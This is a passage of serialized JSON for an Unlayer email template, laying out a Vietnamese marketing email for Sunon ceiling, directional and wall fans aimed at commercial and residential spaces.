Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#843fa1\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_38\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">D\\u00e0nh cho nh\\u00e0 h\\u00e0ng, s\\u1ea3nh ch\\u1edd, trung t\\u00e2m th\\u01b0\\u01a1ng m\\u1ea1i, v\\u0103n ph\\u00f2ng x\\u01b0\\u1edfng...<\\/p>\\\"}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_27\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_18\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"kKsqXnVyp3\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"Aqd_urggX9\\\",\\\"contents\\\":[{\\\"id\\\":\\\"mtNrdaJfzs\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_29\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">Cho d\\u00f9 to\\u00e0 nh\\u00e0 v\\u0103n ph\\u00f2ng l\\u00e0m vi\\u1ec7c cho \\u0111\\u1ebfn trung t\\u00e2m th\\u01b0\\u01a1ng m\\u1ea1i. H\\u1ec7 th\\u1ed1ng qu\\u1ea1t l\\u00e0m m\\u00e1t kh\\u00f4ng gian Commercial s\\u1ebd gi\\u00fap b\\u1ea1n chi ph\\u00ed ti\\u1ec1n \\u0111i\\u1ec7n h\\u00e0ng n\\u0103m l\\u00ean \\u0111\\u1ebfn 30%, gi\\u1ea3m t\\u1ea3i cho h\\u1ec7 th\\u1ed1ng \\u0111i\\u1ec1u ho\\u00e0 nhi\\u1ec7t \\u0111\\u1ed9 \\u1edf m\\u1ee9c th\\u1ea5p nh\\u1ea5t. Kh\\u00e1ch h\\u00e0ng v\\u00e0 nh\\u00e2n vi\\u00ean c\\u1ee7a b\\u1ea1n s\\u1ebd c\\u1ea3m th\\u1ea5y tho\\u1ea3i m\\u00e1i nhi\\u1ec7t v\\u00e0 c\\u00f4ng vi\\u1ec7c s\\u1ebd hi\\u1ec7u qu\\u1ea3 h\\u01a1n<\\/p>\\\"}},{\\\"id\\\":\\\"DnUUBWY2GS\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#e67e23\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_4\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"T\\u00ccM HI\\u1ec2U TH\\u00caM &gt;&gt;\\\",\\\"calculatedWidth\\\":165,\\\"calculatedHeight\\\":37},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_17\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"SfJxIR8VTG\\\",\\\"contents\\\":[{\\\"id\\\":\\\"iOdEggIzon\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677301347994-home_hgp.jpg\\\",\\\"width\\\":1000,\\\"height\\\":600},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_13\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_18\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_12\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"nrSzXypjKi\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"CvjCDJjkzY\\\",\\\"contents\\\":[{\\\"id\\\":\\\"OJhlDIv95-\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h2\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Open Sans\\\",\\\"value\\\":\\\"\'Open Sans\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"17px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_5\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong>L\\u00c0M M\\u00c1T M\\u00d4I TR\\u01af\\u1edcNG NH\\u00c0 \\u1ede - C\\u0102N H\\u1ed8 CHUNG C\\u01af<\\/strong>\\\"}},{\\\"id\\\":\\\"in1mOpUxlF\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#3598db\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_37\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">D\\u00e0nh cho nh\\u00e0 \\u1edf Villa, Penhouse, nh\\u00e0 \\u1edf chung c\\u01b0, bi\\u1ec7t th\\u1ef1.<\\/p>\\\"}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_12\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_8\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"pSo0O61gVc\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"5KcRMCbBIz\\\",\\\"contents\\\":[{\\\"id\\\":\\\"n87OHQl-xs\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_30\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">V\\u1edbi kh\\u00f4ng gian Nh\\u00e0 \\u1ede n\\u01a1i c\\u00f3 con ng\\u01b0\\u1eddi sinh ho\\u1ea1t h\\u00e0ng n\\u00e0y. Qu\\u1ea1t tr\\u1ea7n nh\\u00e0 \\u1edf d\\u00e2n d\\u1ee5ng s\\u1ebd gi\\u00fap tho\\u1ea3i m\\u00e1i kh\\u00f4ng gian th\\u00f4ng tho\\u00e1ng c\\u1ea3 ng\\u00e0y. Th\\u00eam m\\u1ed9t c\\u1ea3m bi\\u1ebfn chuy\\u1ec3n \\u0111\\u1ed9ng t\\u00edch h\\u1ee3p s\\u1ebd b\\u1eadt\\/t\\u1eaft qu\\u1ea1t b\\u00e1n t\\u1ef1 \\u0111\\u1ed9ng, trong khi c\\u00e1c c\\u1ea3m bi\\u1ebfn m\\u00f4i tr\\u01b0\\u1eddng li\\u00ean t\\u1ee5c theo d\\u00f5i t\\u00ecnh tr\\u1ea1ng ph\\u00f2ng c\\u1ee7a b\\u1ea1n. Ch\\u1ec9 c\\u1ea7n \\u0111\\u1eb7t t\\u00f9y ch\\u1ecdn \\u0111\\u1ec3 t\\u1ef1 \\u0111\\u1ed9ng qu\\u1ea3n l\\u00fd lu\\u1ed3ng kh\\u00f4ng kh\\u00ed v\\u00e0 \\u00e1nh s\\u00e1ng LED c\\u1ea7n thi\\u1ebft \\u0111\\u1ec3 gi\\u00fap b\\u1ea1n tho\\u1ea3i m\\u00e1i b\\u1ea5t c\\u1ee9 l\\u00fac n\\u00e0o.<\\/p>\\\"}},{\\\"id\\\":\\\"MAaPPLSPMo\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#e67e23\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_5\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"T\\u00ccM HI\\u1ec2U TH\\u00caM &gt;&gt;\\\",\\\"calculatedWidth\\\":165,\\\"calculatedHeight\\\":37},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_19\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"FYvUHy69rA\\\",\\\"contents\\\":[{\\\"id\\\":\\\"yX-dPu02lY\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1695186067736-sunon_email_modern_white.jpg\\\",\\\"width\\\":1000,\\\"height\\\":600},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_14\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_20\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_13\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"gpbXacTCNb\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"hlnnpTaegH\\\",\\\"contents\\\":[{\\\"id\\\":\\\"yFnFQxtSi3\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h2\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Open Sans\\\",\\\"value\\\":\\\"\'Open Sans\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"17px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_9\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"L\\u00c0M M\\u00c1T THO\\u00c1T - QU\\u1ea0T TH\\u1ed4I S\\u00c0N L\\u1edaN &amp; QU\\u1ea0T L\\u00c0M M\\u00c1T BAY H\\u01a0I\\\"}},{\\\"id\\\":\\\"-VZKpX5jT4\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#f50f0f\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_36\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">D\\u00e0nh cho nh\\u00e0 x\\u01b0\\u1edfng, c\\u00f4ng nghi\\u1ec7p, v\\u0103n ph\\u00f2ng th\\u01b0\\u01a1ng m\\u1ea1i, nh\\u00e0 h\\u00e0ng.<\\/p>\\\"}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_28\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_19\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"D3r9CY5vTq\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"iJJGVaZsMu\\\",\\\"contents\\\":[{\\\"id\\\":\\\"UnnHRc5XxW\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_33\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">Cho d\\u00f9 b\\u1ea1n c\\u1ea7n l\\u00e0m s\\u1ea1ch kh\\u00f3i hay l\\u00e0m m\\u00e1t cho nh\\u00e2n vi\\u00ean, qu\\u1ea1t th\\u1ed5i s\\u00e0n (Directional Fans) v\\u00e0 qu\\u1ea1t treo t\\u01b0\\u1eddng (Wall Fans) s\\u1ebd g\\u1eedi kh\\u00f4ng kh\\u00ed \\u0111\\u1ebfn nh\\u1eefng n\\u01a1i c\\u1ea7n thi\\u1ebft.<\\/p>\\\"}},{\\\"id\\\":\\\"c7cn6GLoXj\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#e67e23\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_6\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">XEM TH\\u00caM &gt;&gt;<\\/span>\\\",\\\"calculatedWidth\\\":134,\\\"calculatedHeight\\\":37},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_21\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"XIvPF9CI3W\\\",\\\"contents\\\":[{\\\"id\\\":\\\"r414ef32j9\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1695185971739-directional_fan_sunon_email.jpg\\\",\\\"width\\\":1000,\\\"height\\\":600},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_15\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_22\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_14\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"p4EqtV2GFk\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"taJn1dDs2p\\\",\\\"contents\\\":[{\\\"id\\\":\\\"9ozIGCPT7u\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global 